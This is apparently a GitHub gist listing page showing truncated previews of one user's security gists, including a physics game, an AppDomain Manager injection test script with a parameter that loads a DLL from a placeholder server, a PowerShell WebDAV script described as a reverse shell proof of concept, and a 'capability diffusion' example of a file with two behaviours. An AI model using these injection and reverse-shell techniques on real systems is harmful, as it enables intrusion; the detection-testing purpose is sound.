Skip to content

Instantly share code, notes, and snippets.

View secdev02's full-sized avatar

Casey secdev02

12 followers · 0 following
View GitHub Profile
@secdev02
secdev02 / singlepage.html
Created March 10, 2026 22:18
Free Your Mind - Single Page App - Game and JS Physics
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Physics Construct</title>
<style>
@import url('https://fonts.googleapis.com/css2?family=Share+Tech+Mono&family=Orbitron:wght@400;700;900&display=swap');
:root {
@secdev02
secdev02 / AppDomain_test.ps1
Last active January 30, 2026 18:34
Quick and simple test harness
# AppDomain Manager Injection Detection Tests
# This script tests three methods of AppDomain Manager injection
param(
[string]$TestExecutable = "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
[string]$RemoteServer = "http://yourserver.com/tasks.dll",
[string]$Base64RemoteDll = ""
)
$ErrorActionPreference = "Stop"
@secdev02
secdev02 / README.md
Created January 27, 2026 23:59
Task Manager

Get-ScheduledTask | Where-Object {$_.Actions.Execute -like 'cmd.exe'} | Select-Object TaskName, TaskPath, State

Get-ScheduledTask | ForEach-Object {
    $task = $_
    $_.Actions | Where-Object {$_.Execute -like '*cmd.exe*'} | ForEach-Object {
        [PSCustomObject]@{
            TaskName = $task.TaskName
            TaskPath = $task.TaskPath
 State = $task.State
@secdev02
secdev02 / gist:40e463f2728ebf5058a83c454ab5b06d
Created January 22, 2026 04:49
Equation Group windbreaker dump file
Microsoft (R) Windows Debugger Version 6.12.0002.633 X86
Copyright (c) Microsoft Corporation. All rights reserved.
Loading Dump File [C:\dumps\regret.dmp]
User Mini Dump File: Only registers, stack and portions of memory are available
Symbol search path is: SRV*c:\symbols*http://msdl.microsoft.com/download/symbols
Executable search path is:
Windows XP Version 2600 (Service Pack 2) MP (2 procs) Free x86 compatible
Product: WinNt, suite: SingleUserTS
@secdev02
secdev02 / README.md
Created January 4, 2026 02:38
OGhidra - Analysis

============================================================ [09:00:11] 🚀 SMART TOOL: RENAME ALL FUNCTIONS

Starting OPTIMIZED bulk function analysis with mode: smart_enumeration

============================================================ [09:00:11] ⚡ PERFORMANCE ENHANCEMENTS

• Batch processing (size: 50)

@secdev02
secdev02 / webdav_minimalist.ps1
Created December 21, 2025 18:07
Minimalist - PowerShell WebDAV - Decoy Share
<#
Obtained from https://github.com/re4lity/subTee-gits-backups/blob/master/JEWebDav.ps1
#>
<#
.SYNOPSIS
Simple Reverse Shell over HTTP. Deliver the link to the target and wait for connectback.
Read And Write Files Over WebDAV Proof Of Concept
@secdev02
secdev02 / bginteger.py
Created December 17, 2025 20:02
Factorial Mod N - GCD
import math
import time
def gcd_factorial_efficient(n):
"""Compute GCD(sqrt(n)!, n) efficiently"""
sqrt_n = int(math.sqrt(n))
g = n
print(f"Computing GCD({sqrt_n}!, {n})")
print(f"Processing {sqrt_n} numbers...\n")
@secdev02
secdev02 / README.md
Created December 17, 2025 18:35
Capability Diffusion - Part Two

A single file that has 2 different ways of behaving

IN this case we simply load and compile 2 difference C# calls.

Use your imagination.

image
@secdev02
secdev02 / HelloWorld.cs
Created December 17, 2025 18:06
Capability Diffusion - Sound of Silence - Basic Example.
using System;
using System.Configuration;
using System.IO;
using System.Net;
namespace HelloWorldLib
{
public class HelloWorld
{
private static Configuration _config;
@secdev02
secdev02 / bindiff.ps1
Last active December 16, 2025 23:37
Extractor
<#
.SYNOPSIS
Extracts a specific file from nested CAB files within an MSU package.
.DESCRIPTION
Extracts MSU to get CAB files, then extracts a specific file by name,
and performs additional expansion rounds if the file is itself a CAB.
.PARAMETER MsuPath
Path to the MSU file.